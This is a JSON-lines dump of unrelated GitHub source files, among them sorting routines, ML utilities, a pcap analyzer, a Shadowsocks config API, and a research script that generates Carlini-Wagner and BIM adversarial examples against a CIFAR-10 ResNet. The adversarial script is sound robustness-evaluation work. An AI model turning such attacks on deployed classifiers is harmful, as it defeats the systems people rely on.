'.join(arr))\n\nfile.close()\nwrite_file.close()","repo_name":"miht-sem/algorithms-and-data-structures-labs","sub_path":"Lab1/smallsort-D-insert-sort.py","file_name":"smallsort-D-insert-sort.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12010851947","text":"from copy import deepcopy\n\nimport torch\nfrom torch import nn\n\n\nclass ModelEma(object):\n \"\"\"Model for Exponential Moving Average.\n\n Parameters\n ----------\n model : nn.Module\n Model for training.\n decay : float, optional\n Rate of previous weight, by default 0.9\n n : int, optional\n Interval steps between weight update, by default 1\n \"\"\"\n\n def __init__(self, model: nn.Module, decay: float = 0.9, n: int = 1):\n # make a copy of the model for accumulating moving average of weights\n self.ema_model = deepcopy(model)\n self.ema_model.eval()\n self.decay = decay\n self.n = n\n self.count = self.n\n\n self.ema_model\n self.ema_has_module = hasattr(self.ema_model, \"module\")\n for p in self.ema_model.parameters():\n p.requires_grad_(False)\n\n def _update(self, model):\n # correct a mismatch in state dict keys\n needs_module = hasattr(model, \"module\") and not self.ema_has_module\n with torch.no_grad():\n state_dict = model.state_dict()\n for k, ema_v in self.ema_model.state_dict().items():\n if needs_module:\n k = \"module.\" + k\n model_v = state_dict[k].detach()\n ema_v.copy_(ema_v * self.decay + model_v * (1.0 - self.decay))\n\n def update(self, model):\n self.count -= 1\n if self.count == 0:\n self._update(model)\n self.count = self.n\n","repo_name":"shimacos37/kaggle-days-mumbai-3rd-place","sub_path":"sakami/src/ema.py","file_name":"ema.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"40844262620","text":"import argparse\nfrom . import reviews\nfrom . import config\n\nparser = argparse.ArgumentParser(description=\"\")\n\nsubparsers = parser.add_subparsers(help=\"\")\n\nparser_set = subparsers.add_parser(\n \"set\", help=\"Set the GitHub User ID or access token\")\nparser_set.add_argument(\"--user\", type=str, nargs=1, help=\"GitHub User ID\")\nparser_set.add_argument(\"--token\",\n type=str,\n nargs=1,\n help=\"GitHub Access Token\")\nparser_set.set_defaults(func=config.set)\n\nparser_list = subparsers.add_parser(\"list\",\n help=\"List PRs that need reviewing\")\nparser_list.set_defaults(func=reviews.get_review_requests)\n\n\ndef parse_command():\n args = parser.parse_args()\n args.func(args)\n","repo_name":"Thomas-James-Rose/py-prs","sub_path":"py_prs/py_prs.py","file_name":"py_prs.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19370180766","text":"# free energy plotter\n\ndef read_data(path):\n data = pd.read_csv(path, skiprows=4, header=None,\n delim_whitespace=True).rename(\n columns={\n 0:'bin',\n 1:'xi',\n 2:'count',\n 3:'p'})\n\nclass FreeEnergy():\n \n def __init__(self, ID):\n self.ID = ID\n self.path = 'results/{}/xi.hist'.format(ID)\n\n def change_path(self, new_path):\n self.path = new_path\n\n def probability(self):\n data = read_data(self.path)\n return data\n\n def calculate_energy(self, kBT=1.2):\n data = self.read_data(self)\n p = data['p']\n F = -kBT * np.array([math.log10(num) for num in p])\n data['F']=F\n return data\n\n def plot_energy(self, wind):\n data = self.calculate_energy(self)\n roller = data.rolling(wind, center=True)\n fig, ax = plt.subplots(1)\n ax.plot(data['xi'], r.mean()['F'], c='red')\n ax.bar(data['xi'], data['F'], alpha=0.4, width=0.01)\n ax.fill_between(data['xi'], r.mean()['F']+r.std()['F'],\n r.mean()['F']-r.std()['F'], alpha=0.4, color='red')\n plt.xlabel(r'$\\xi$ [$\\sigma$]')\n plt.ylabel(r'F($\\xi$) [$k_BT$]')\n","repo_name":"debeshmandal/starpolymers","sub_path":"archive/energyer.py","file_name":"energyer.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"26708409312","text":"import argparse\nimport os\nfrom scapy.all import *\nfrom binascii import *\nfrom modules.filters import analyze_udp as udp, analyze_tcp as tcp, analyze_icmp as icmp, analyze_arp as arp, \\\n analyze_all as all\nfrom util import consts\n\nPCAP_FILE_NAME = \"trace-2.pcap\"\nPCAP_FILE_PATH = \".\\packets\\\\\" + PCAP_FILE_NAME\n\n\n\n\ndef main():\n \"\"\"\n main function which is called when program is started\n this function takes an argument -p as protocol to indicate which protocol should be analyzed from a pcap file\n if no argument is given it analyzes all packets\n \"\"\"\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"-p\",\n type=str,\n help=\"Specifies protocol to be parsed\",\n )\n\n parser.add_argument(\n \"-f\",\n type=str,\n help=\"Name of pcap file to be analyzed. If it is not given program analyzes const file defined above\"\n )\n args = parser.parse_args()\n\n if args.f is not None:\n global PCAP_FILE_NAME\n PCAP_FILE_NAME = args.f\n global PCAP_FILE_PATH\n PCAP_FILE_PATH = \".\\packets\\\\\" + PCAP_FILE_NAME\n\n if PCAP_FILE_NAME[-5:] != \".pcap\":\n print(\"Incorrect file type\")\n print(\"File need to be a .pcap type\")\n return\n if not os.path.exists(PCAP_FILE_PATH):\n print(\"{} is not in .\\\\packets\".format(PCAP_FILE_NAME))\n print(\"Please add file to directory\")\n return\n\n\n\n if args.p is not None:\n if args.p.upper() in consts.CORRECT_PROTOCOLS:\n if args.p.upper() == \"ICMP\":\n analyze_icmp()\n elif args.p.upper() == \"ARP\":\n analyze_arp()\n elif args.p.upper() == \"TFTP\":\n analyze_udp()\n else:\n analyze_tcp(args.p.upper())\n\n else:\n print(\"{} is a incorrect protocol\".format(args.p.upper()))\n else:\n analyze_all()\n\n\ndef analyze_arp() -> None:\n \"\"\"\n function that is called when parameter for protocol was ARP\n starts the analyzation of packet communication with arp protocol\n \"\"\"\n raw_packets = rdpcap(PCAP_FILE_PATH)\n packets = []\n for packet in raw_packets:\n packets.append(hexlify(raw(packet)).decode())\n\n arp.AnalyzeArp(packets, PCAP_FILE_NAME)\n\n\ndef analyze_icmp() -> None:\n \"\"\"\n function that is called when paramater -p was icmp and it starts\n the analyzation of communication between packets with icmp protocol\n \"\"\"\n raw_packets = rdpcap(PCAP_FILE_PATH)\n packets = []\n for packet in raw_packets:\n packets.append(hexlify(raw(packet)).decode())\n\n icmp.AnalyzeIcmp(packets, PCAP_FILE_NAME)\n\n\ndef analyze_udp() -> None:\n \"\"\"\n function which is called when parameter -p was tftp\n it starts the analyzation of tftp packets and their communications\n \"\"\"\n raw_packets = rdpcap(PCAP_FILE_PATH)\n packets = []\n for packet in raw_packets:\n packets.append(hexlify(raw(packet)).decode())\n\n udp.AnalyzeUdp(packets, PCAP_FILE_NAME)\n\n\ndef analyze_all() -> None:\n \"\"\"\n function which is called when paramter -p was not given\n it starts the analyzation of all packets\n \"\"\"\n raw_packets = rdpcap(PCAP_FILE_PATH)\n packets = []\n for packet in raw_packets:\n packets.append(hexlify(raw(packet)).decode())\n\n all.AnalyzeAll(packets, PCAP_FILE_NAME)\n\n\ndef analyze_tcp(protocol: str) -> None:\n \"\"\"\n function which is called when parameter -p had an tcp protocol\n it starts the analyzation of given tcp protocol and its communications\n \"\"\"\n raw_packets = rdpcap(PCAP_FILE_PATH)\n packets = []\n for packet in raw_packets:\n packets.append(hexlify(raw(packet)).decode())\n\n tcp.AnalyzeTcp(packets, PCAP_FILE_NAME, protocol)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Wormiq056/Internet-packet-analyzer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74715781362","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\nimport os\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python.platform import flags\nfrom keras.layers import Input\nfrom cleverhans.attacks import CarliniWagnerL2\nfrom cleverhans.dataset import MNIST\nfrom cleverhans.loss import CrossEntropy\nfrom cleverhans.utils import grid_visual, AccuracyReport\nfrom cleverhans.utils import set_log_level\nfrom cleverhans.utils_tf import model_eval, tf_model_load\nfrom cleverhans.train import train\nfrom cleverhans.utils_keras import KerasModelWrapper\t\nfrom build_model import ImageModel \nfrom load_data import ImageData, split_data\nimport pickle as pkl\nfrom keras.utils import to_categorical\nfrom attack_model import Attack, CW, BIM\nimport scipy\n\n\nif __name__ == '__main__':\n\timport argparse\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument('--dataset_name', type = str, \n\t\tchoices = ['cifar10'], \n\t\tdefault = 'cifar10')\n\n\tparser.add_argument('--model_name', type = str, \n\t\tchoices = ['resnet'], \n\t\tdefault = 'resnet') \n\n\tparser.add_argument('--data_sample', type = str, \n\t\tchoices = ['x_train', 'x_val', 'x_val200'], \n\t\tdefault = 'x_val200')\n\n\tparser.add_argument(\n\t\t\t'--attack',\n\t\t\ttype = str,\n\t\t\tchoices = ['cw', 'bim', 'bim2'],\n\t\t\tdefault = 'cw'\n\t)\n\n\targs = parser.parse_args()\n\tdict_a = vars(args) \n\tdata_model = args.dataset_name + args.model_name\n\n\tif data_model not in os.listdir('./'):\t\n\t\tos.mkdir(data_model)\n\tif 'results' not in os.listdir('./{}'.format(data_model)):\n\t\tos.mkdir('{}/results'.format(data_model))\n\tif 'models' not in os.listdir(data_model):\n\t\tos.mkdir('{}/models'.format(data_model))\n\tif 'data' not in os.listdir(data_model):\n\t\tos.mkdir('{}/data'.format(data_model))\n\tif 'figs' not in os.listdir(data_model):\n\t\tos.mkdir('{}/figs'.format(data_model))\n\n\tprint('Loading dataset...') \n\tdataset = ImageData(args.dataset_name)\n\tmodel = ImageModel(args.model_name, args.dataset_name, train = False, load = True)\n\n\tif args.dataset_name == 'cifar10':\n\t\tX_train, Y_train, X_test, Y_test = split_data(dataset.x_val,\n\t\t\tdataset.y_val, model, num_classes = 10, \n\t\t\tsplit_rate = 0.8, sample_per_class = 1000)\n\n\n\tprint('Sanity checking...')\n\tdata_sample = X_test\n\tprint('data_sample.shape', data_sample.shape)\n\tprint('X_train.shape', X_train.shape)\n\n\tpred_test = model.predict(dataset.x_val)\n\tdef cross_entropy(predictions, targets, epsilon=1e-12):\n\t\tpredictions = np.clip(predictions, epsilon, 1. - epsilon)\n\t\tN = predictions.shape[0]\n\t\tce = -np.sum(targets*np.log(predictions+1e-9))/N\n\t\treturn ce\n\n\tce = cross_entropy(pred_test, dataset.y_val, epsilon=1e-12)\n\tacc = np.mean(np.argmax(pred_test, axis = 1) == np.argmax(dataset.y_val, axis = 1))\n\tprint('The accuracy is {}. The cross entropy is {}.'.format(acc, ce))\n\n\n\tif args.attack == 'cw':\n\t\tif args.dataset_name in ['cifar10']:\n\t\t\tif args.model_name == 'resnet':\n\t\t\t\tattack_model = CW(\n\t\t\t\t\tKerasModelWrapper(model.model),\n\t\t\t\t\tmodel.input_ph,\n\t\t\t\t\tmodel.num_classes,\n\t\t\t\t\tsource_samples = 100,\n\t\t\t\t\tbinary_search_steps = 5, \n\t\t\t\t\tcw_learning_rate = 1e-2, \n\t\t\t\t\tconfidence = 0, \n\t\t\t\t\tattack_iterations = 100, \n\t\t\t\t\tattack_initial_const = 1e-2,\n\t\t\t\t)\n\telif args.attack == \"bim\":\n\t\tif args.dataset_name in ['cifar10']:\n\t\t\tif args.model_name == 'resnet':\n\t\t\t\tattack_model = BIM(\n\t\t\t\t\t\tKerasModelWrapper(model.model),\n\t\t\t\t\t\tmodel.sess,\n\t\t\t\t\t\tmodel.input_ph,\n\t\t\t\t\t\tmodel.num_classes,\n\t\t\t\t\t\tattack_iterations = 100,\n\t\t\t\t\t\tepsilon=0.03,\n\t\t\t\t\t\tlearning_rate=2.5 * 0.03 / 100,\n\t\t\t\t\t\trandom_init=True\n\t\t\t\t)\n\telif args.attack == \"bim2\":\n\t\tif args.dataset_name in ['cifar10']:\n\t\t\tif args.model_name == 'resnet':\n\t\t\t\tattack_model = BIM(\n\t\t\t\t\t\tKerasModelWrapper(model.model),\n\t\t\t\t\t\tmodel.sess,\n\t\t\t\t\t\tmodel.input_ph,\n\t\t\t\t\t\tmodel.num_classes,\n\t\t\t\t\t\tattack_iterations = 10,\n\t\t\t\t\t\tepsilon=0.03,\n\t\t\t\t\t\tlearning_rate=2.5 * 0.03 / 10,\n\t\t\t\t\t\trandom_init=True\n\t\t\t\t)\n\n\n\t###################################################\n\t# filter data samples with correct predictions by model and successsful attacks\n\t###################################################\n\n\tdata_types = ['train', 'test']\n\tdata = {'train': (X_train, Y_train), 'test': (X_test, Y_test)}\n\tif args.data_sample == 'x_val200':\n\t\tnum_samples = {'train': 800, 'test': 200}\n\n\tfor data_type in data_types:\n\t\tx, y = data[data_type]\n\t\tprint('x.shape', x.shape)\n\t\tprint('y.shape', y.shape)\n\t\tnum_successes = 0\n\t\toris = []\n\t\tperturbeds = []\n\n\n\t\tbatch_size = int(np.minimum(100, num_samples[data_type]))\n\t\tcur_batch = 0\n\t\tconf = 15\n\t\tepsilon = 0\n\t\twhile num_successes < num_samples[data_type]:\n\t\t\tbatch_x, batch_y = x[cur_batch * batch_size:(cur_batch+1) * batch_size], y[cur_batch * batch_size:(cur_batch+1) * batch_size]\n\n\t\t\tprint('batch_x', batch_x.shape)\n\t\t\tx_adv = attack_model.attack(batch_x)\n\t\n\t\t\tprint('x_adv', x_adv.shape)\n\t\t\tif x_adv.shape[0] == 0:\n\t\t\t\tcontinue\n\t\t\tx_adv_labels = np.argmax(model.predict(x_adv), axis = -1)\n\t\t\tindex_filter = (x_adv_labels != np.argmax(batch_y, axis = 1))\n\t\t\tori = batch_x[index_filter]\n\t\t\tperturbed = x_adv[index_filter]\n\t\t\tprint('Success rate', perturbed.shape[0] / len(x_adv))\n\t\t\toris.append(ori)\n\t\t\tperturbeds.append(perturbed)\n\n\t\t\tcur_batch += 1\n\t\t\tnum_successes += len(ori)\n\t\t\tprint('Number of successsful samples is {}'.format(num_successes))\n\n\t\toris = np.concatenate(oris, axis = 0)\n\t\tperturbeds = np.concatenate(perturbeds, axis = 0)\n\n\t\toris = oris[:num_samples[data_type]]\n\t\tperturbeds = perturbeds[:num_samples[data_type]]\n\n\t\tprint('oris.shape', oris.shape)\n\t\tprint('perturbeds.shape', perturbeds.shape)\n\n\t\tnp.save('{}/data/{}{}_{}_{}.npy'.format(\n\t\t\tdata_model, \n\t\t\targs.data_sample,\n\t\t\t'' if data_type == 'test' else '_train',\n\t\t\targs.attack, \n\t\t\t'ori'), \n\t\t\toris)\n\t\tnp.save('{}/data/{}{}_adv_{}_{}.npy'.format(\n\t\t\tdata_model, \n\t\t\targs.data_sample,\n\t\t\t'' if data_type == 'test' else '_train',\n\t\t\targs.attack, \n\t\t\t'ori'), \n\t\t\tperturbeds)\n\n","repo_name":"google-research/active-adversarial-tests","sub_path":"case_studies/ml_loo/generate_attack.py","file_name":"generate_attack.py","file_ext":"py","file_size_in_byte":5911,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"75"} +{"seq_id":"11813171837","text":"import numpy as np\nimport scipy.integrate as si\nimport matplotlib.pyplot as plt\nimport seaborn as sb\n\n# este programa fue creado por marcos sidoruk como un trabajo final de fisica 2\n#\n# el problema a resolver consiste en un interferometro similar al de michaelson\n# se pide la distribucion de intensidad en una pantalla ubicada a una cierta distancia\n# de dos fuentes que se posicionan una detras de la otra con respecto a la pantalla\n# luego se pide la misma distribucion si la pantalla se inclina arbitrariamente\n#\n# por motivos tecnicos, es mucho mas facil mover las fuentes que la pantalla\n# por lo tanto disenaremos el programa tal que la pantalla este fija en el plano xy\n# y sean las fuentes las que se muevan para que estas terminen a la inclinacion que el\n# usuario desee, ademas el programa contara con grados de libertad\n# extra que no son requeridas por el enunciado pero que son faciles de implementar y\n# resultan en codigo mas limpio.\n\n\n# DEFINICIONES:\n\n# el usuario puede cambiar las siguientes:\n\nC = 0.1 # velocidad de las ondas\n\n# nota: la pantalla esta centrada en el 0 y es cuadrada de lado DEF_SCREEN_SIZE\nDEF_SCREEN_RES = 10 # factor de conversion pixeles/metro\nDEF_SCREEN_SIZE = 20 # en metros\nDEF_SCREEN_TIME_RES = 1 # intervalo de tiempo sobre el cual la pantalla promedia la intensidad\n\n# esto es una manera de definir una funcion source() tal que se puedan crear multiples\n# instancias cada una con distintos valores para ciertos parametros internos\n# primero se crea un objeto de esta clase lo que automaticamente llama a __init__ y\n# inicializa los parametros, luego el objeto se puede usar como una funcion gracias al\n# metodo __call__\n# cada instancia de esta clase representa una fuente puntual.\nclass source:\n\n def __init__( self, position: np.ndarray, ang_freq, phase = 0, amplitude = 1, line = False ):\n \n self.position = position\n self.ang_freq = ang_freq\n self.phase = phase\n self.amplitude = amplitude\n self.spacial_ang_freq = self.ang_freq / C\n \n self.line = line\n if line == True:\n self.position = np.append( position[0:1], position[2] )\n\n def __call__( self, x: np.ndarray, t: float ):\n \n if self.line == True:\n x = np.append( x[0:1], x[2] )\n\n r = np.linalg.norm(x-self.position)\n t_phase = self.ang_freq * t - self.spacial_ang_freq * r + self.phase\n \n return self.amplitude * np.sin( t_phase )/r\n\n# misma cosa que arriba, solo que esta clase debe inicializarse una sola vez\n# define una funcion que retorna el proedio temporal de la intensidad en cada pixel de la pantalla\nclass init_screen:\n\n def __init__( self, screen_size, source_list, screen_resolution = DEF_SCREEN_RES, screen_time_res = DEF_SCREEN_TIME_RES ): \n self.size = screen_size\n self.res = screen_resolution\n self.sources = source_list\n self.time_res = screen_time_res\n\n # crea grid correspondiente a la pantalla:\n self.num_pixels = self.res * self.size # n de pixeles en una direccion\n \n sl = self.size/2\n jmp = 1/self.res\n\n self.screen = np.mgrid[ -sl:sl:jmp, -sl:sl:jmp ]\n self.screen = self.screen.T\n \n def get_intensity( self, x, t ):\n \n field = 0\n for s in self.sources:\n field += s( x, t )\n\n return field**2\n\n # obtener la intensidad en todos los pixeles de la pantalla a tiempo t\n def __call__( self, t ):\n \n result = np.zeros( ( self.num_pixels, self.num_pixels ) )\n\n for i, row in enumerate( self.screen ):\n for j, v in enumerate( row ):\n v = np.append(v,0) \n pix_int = lambda t0: self.get_intensity( v, t0 )\n result[i][j] = si.quad( pix_int, t, t+self.time_res )[0]/self.time_res\n\n return result\n\n# utilidad para pasar de polares a cartesianas\ndef polar_to_cart( r, theta ):\n\n x = r*np.cos(theta)\n y = r*np.sin(theta)\n return x,y\n \n# resuelve el problema del enunciado\ndef michaelson_angle( alpha, distances: list, ang_freq, screen_size = DEF_SCREEN_SIZE, screen_res = DEF_SCREEN_RES):\n \n source_list = []\n for d in distances:\n z, x = polar_to_cart( d, alpha )\n v = np.array([ x, 0, z ])\n s = source( v, ang_freq)\n source_list.append(s)\n\n screen = init_screen( screen_size, source_list, screen_resolution = screen_res )\n \n measurement = screen(0)\n max_value = np.amax( measurement )\n\n sb.set()\n sb.heatmap( measurement, vmin=0, vmax = max_value )\n plt.savefig(\"michaelson.jpg\")\n\n# extra:\ndef young( d_sources: list, d_screen, ang_freq, screen_size = DEF_SCREEN_SIZE ):\n \n source_list = []\n for d in d_sources:\n source_list.append( source( np.array([ d, 0, d_screen ] ), ang_freq, line = True ) )\n\n screen = init_screen( screen_size, source_list )\n\n measurement = screen(0)\n max_val = np.amax( measurement )\n\n sb.set()\n sb.heatmap( measurement, vmin = 0, vmax = max_val )\n plt.savefig(\"young.jpg\")\n\n\n#young( [-1, 1], 10, 100 )\nmichaelson_angle( 0, [2,4], 10 )\n","repo_name":"KITOS2003/Otros-Scripts-de-F2","sub_path":"tp_numerico.py","file_name":"tp_numerico.py","file_ext":"py","file_size_in_byte":5158,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"42914510834","text":"\"\"\"\nMerge Sort Sorting Algorithm\n\"\"\"\nimport math\n\n\ndef merge_sort(arr: list) -> list:\n length = len(arr)\n if length == 1:\n return arr\n # Split array in into right and left\n middle = math.floor(length / 2)\n left = arr[0:middle]\n right = arr[middle:]\n\n return merge(merge_sort(left), merge_sort(right))\n\n\ndef merge(left: list, right: list) -> list:\n result = []\n left_index = 0\n right_index = 0\n while (left_index < len(left)) and (right_index < len(right)):\n if left[left_index] < right[right_index]:\n result.append(left[left_index])\n left_index += 1\n else:\n result.append(right[right_index])\n right_index += 1\n return result + left[left_index:] + right[right_index:]\n\n\narr = [99, 44, 6, 2, 1, 5, 63, 87, 283, 4, 0]\nprint(merge_sort(arr))\n","repo_name":"SteliosGian/data-structures-and-algorithms","sub_path":"algorithms/sorting/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"70104290804","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# Load data\ndata = pd.read_csv('your_data_file.csv', index_col=0)\nvalues = data.values.astype('float32')\n\n# Define ARIMA model\nclass ARIMA(nn.Module):\n def __init__(self, p, d, q):\n super(ARIMA, self).__init__()\n self.ar = nn.Linear(p, 1, bias=False)\n self.ma = nn.Linear(q, 1, bias=False)\n self.d = d\n\n def forward(self, x):\n ar_term = self.ar(x[:, :-self.d])\n ma_term = self.ma(x[:, -self.d:])\n return ar_term + ma_term\n\n# Define hyperparameters\np = 0\nd = 1\nq = 1\nlr = 0.001\nepochs = 1000\n\n# Create ARIMA model\nmodel = ARIMA(p, d, q)\n\n# Define loss function and optimizer\ncriterion = nn.MSELoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=lr)\n\n# Train model\nfor epoch in range(epochs):\n # Reset gradient\n optimizer.zero_grad()\n\n # Forward pass\n inputs = torch.tensor(values[:-1])\n targets = torch.tensor(np.diff(values, axis=0))\n outputs = model(inputs)\n\n # Compute loss and backpropagation\n loss = criterion(outputs, targets)\n loss.backward()\n optimizer.step()\n\n # Print progress\n if (epoch+1) % 100 == 0:\n print('Epoch [{}/{}], Loss: {:.4f}'.format(epoch+1, epochs, loss.item()))\n\n# Predict future values\nfuture_inputs = torch.tensor(values[-1:])\nfor i in range(12):\n future_outputs = model(future_inputs)\n future_inputs = torch.cat((future_inputs, future_outputs), dim=1)\n\n# Plot results\nplt.plot(values, label='Original')\nplt.plot(np.concatenate((values[:-1], values[-1:] + future_outputs.detach().numpy())), label='Predicted')\nplt.legend()\nplt.show()\n","repo_name":"benjamin-botbol/arima_torch","sub_path":"arima.py","file_name":"arima.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5013822927","text":"# -*- coding: utf-8 -*-\n# @Author: limeng\n# @File : 3model_ning.py\n# @time : 2019/7/2\n\"\"\"\n文件说明:\n\"\"\"\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error, log_loss, accuracy_score,roc_auc_score\n\noripath = \"/home/dev/lm/paipai/ori_data/\"\nfeature_path = '/home/dev/lm/paipai/feature_ning/'\n\ntrain = pd.read_csv(feature_path+\"ning_train.csv\")\ntest = pd.read_csv(feature_path+\"ning_test.csv\")\n\ny = \"early_repay_days\"\n\ndrop_list= ['age','info_insert_date','taglist','repay_amt','repay_date','early_repay_days','late_repay_days','auditing_date','listing_id','user_id']\nfeatures = []\nfor col in train.columns:\n if col not in drop_list:\n features.append(col)\n\nn = 33\n\nimport sys\nsys.path.append(\"/home/dev/lm/utils_lm\")\nsys.path.append(\"/home/dev/lm/DeepCTR_multi\")\n\nX_train = train[features]\nX_test = test[features]\nfor i in X_train.columns:\n X_train[i] = X_train[i].fillna(X_train[i].median())\n X_test[i] = X_test[i].fillna(X_test[i].median())\n\nX_test = X_test.reset_index(drop=True)\n\nsparse_features = [\"info_insert_date_month\",\"reg_mon_date_month\",\"due_date_day\"]\ndense_features = [i for i in X_train.columns if i not in sparse_features]\ntarget = y\nfrom sklearn.preprocessing import LabelEncoder, MinMaxScaler\nfrom sklearn.model_selection import train_test_split\nfrom deepctr1.models import DeepFM\nfrom deepctr1.utils import SingleFeat\n\n#对稠密特征归一化\nmms = MinMaxScaler(feature_range=(0, 1))\nX_train[dense_features] = mms.fit_transform(X_train[dense_features])\nX_test[dense_features] = mms.transform(X_test[dense_features])\n\n#对稀疏特征编码 千维特征速度奇慢\nfor feat in sparse_features:\n lbe = LabelEncoder()\n X_train[feat] = lbe.fit_transform(X_train[feat])\n X_test[feat] = lbe.transform(X_test[feat])\n\nsparse_feature_list = [SingleFeat(feat, X_train[feat].nunique()) # since the input is string\n for feat in sparse_features]\ndense_feature_list = [SingleFeat(feat, 0, )\n for feat in dense_features]\n\ntrain_model_input = [X_train[feat.name].values for feat in sparse_feature_list] + \\\n [X_train[feat.name].values for feat in dense_feature_list]\ntest_model_input = [X_test[feat.name].values for feat in sparse_feature_list] + \\\n [X_test[feat.name].values for feat in dense_feature_list]\n\nt_true = pd.get_dummies(train[target])\nmodel = DeepFM({\"sparse\": sparse_feature_list,\"dense\": dense_feature_list}, task='multi-class')\n# model.compile(\"adam\", \"binary_crossentropy\", metrics=['binary_crossentropy'], ) #2.1897\nmodel.compile(\"adam\", \"categorical_crossentropy\", metrics=['crossentropy'], ) #\n\nhistory = model.fit(train_model_input, t_true.values,batch_size=512, epochs=10, verbose=2, validation_split=0.2, )\npred_train = model.predict(train_model_input, batch_size=512)\nprint(\"train score\", log_loss(train[target].values, pred_train))\n\npred_test = model.predict(test_model_input, batch_size=512)\n\n#####输出结果\n# train_prob = pd.DataFrame(pred_train)\n# train_dic = {\n# \"user_id\": train[\"user_id\"].values,\n# \"listing_id\":train[\"listing_id\"].values,\n# \"auditing_date\":train[\"auditing_date\"].values,\n# \"due_date\":train[\"due_date\"].values,\n# \"due_amt\":train[\"due_amt\"].values,\n# }\n# for key in train_dic:\n# train_prob[key] = train_dic[key]\n# train_prob.to_csv(feature_path + 'sub_ning_dfm.csv', index=None)\n\ntest_prob = pd.DataFrame(pred_test)\ntest_dic = {\n \"user_id\": test[\"user_id\"].values,\n \"listing_id\":test[\"listing_id\"].values,\n \"auditing_date\":test[\"auditing_date\"].values,\n \"due_amt\":test[\"due_amt\"].values,\n}\nfor key in test_dic:\n test_prob[key] = test_dic[key]\n#输出预测概率\n# test_prob.to_csv(outpath+'out_dfm368_test.csv',index=None)\nfor i in range(n-1):\n test_prob[i] = test_prob[i]*test_prob[\"due_amt\"]\n#对于训练集评价\ndef df_rank(df_prob, df_sub):\n for i in range(33):\n print('转换中',i)\n df_tmp = df_prob[['listing_id', i]]\n df_tmp['rank'] = i+1\n df_sub = df_sub.merge(df_tmp,how='left',on=[\"listing_id\",'rank'])\n df_sub.loc[df_sub['rank']==i+1,'repay_amt']=df_sub.loc[df_sub['rank']==i+1,i]\n return df_sub[['listing_id','repay_amt','repay_date']]\n#提交\nsubmission = pd.read_csv(open(oripath+\"submission.csv\",encoding='utf8'),parse_dates=[\"repay_date\"])\nsubmission['rank'] = submission.groupby('listing_id')['repay_date'].rank(ascending=False,method='first')\nsub = df_rank(test_prob, submission)\nsub.to_csv(feature_path+'sub_ning_dfm.csv',index=None)","repo_name":"LibraM9/DeepCTR-multi","sub_path":"3model_ning.py","file_name":"3model_ning.py","file_ext":"py","file_size_in_byte":4572,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"25553406775","text":"from fastapi import FastAPI, Request\nfrom fastapi.responses import FileResponse\nfrom ipaddress import ip_network, ip_address\nimport uvicorn\nfrom snitch import Snitch\nimport os\nfrom dotenv import load_dotenv\n# from fastapi.middleware.cors import CORSMiddleware\n\nAPP_API = FastAPI()\nsnitch = Snitch()\nload_dotenv()\nip = os.getenv(\"IP_ADDRESS\")\nhost = os.getenv(\"HOST\")\nport = os.getenv(\"PORT\")\nport = int(port)\nmethod = os.getenv(\"METHOD\")\n\n# you can use middlevare for prod environment\n# origins = [\n# \"http://localhost:3000\"\n# ]\n\n#APP_API.add_middleware(\n# CORSMiddleware,\n# allow_origins=origins,\n# allow_credentials=True,\n# allow_methods=[\"*\"],\n# allow_headers=[\"*\"],\n#)\n\n@APP_API.get(\"/status\")\nasync def status():\n return \"ok\"\n\n@APP_API.post('/update')\nasync def update(request: Request):\n try:\n # get ports and passwords from POST Query\n users = await request.json()\n return snitch.updateConfig(users, ip, method)\n except Exception as e:\n print(f\"Configuration file updating failed - {str(e)}\")\n return False\n\nif __name__ == '__main__':\n uvicorn.run(APP_API, \n host=host, \n port=port, \n # ssl_certfile=r'/www/wwwroot/certificate.crt', \n # ssl_keyfile=r'/www/wwwroot/private.key', \n log_level='info')\n \n","repo_name":"OGBobston/Shadowsocks-Python-WebAPI","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"30386346855","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on May 31 10:55:40 2023\n\n@author: Jerome Yutai Shen\n\n\"\"\"\nfrom typing import List\n\n\ndef max_subsequence(a: List[int], diff = 1):\n count = {}\n for num in a:\n count[num] = count.get(num, 0) + 1\n\n max_len=0\n for num in count:\n max_len = max(max_len, count[num] + count.get(num + diff, 0))\n return max_len\n\n\nif __name__ == \"__main__\":\n 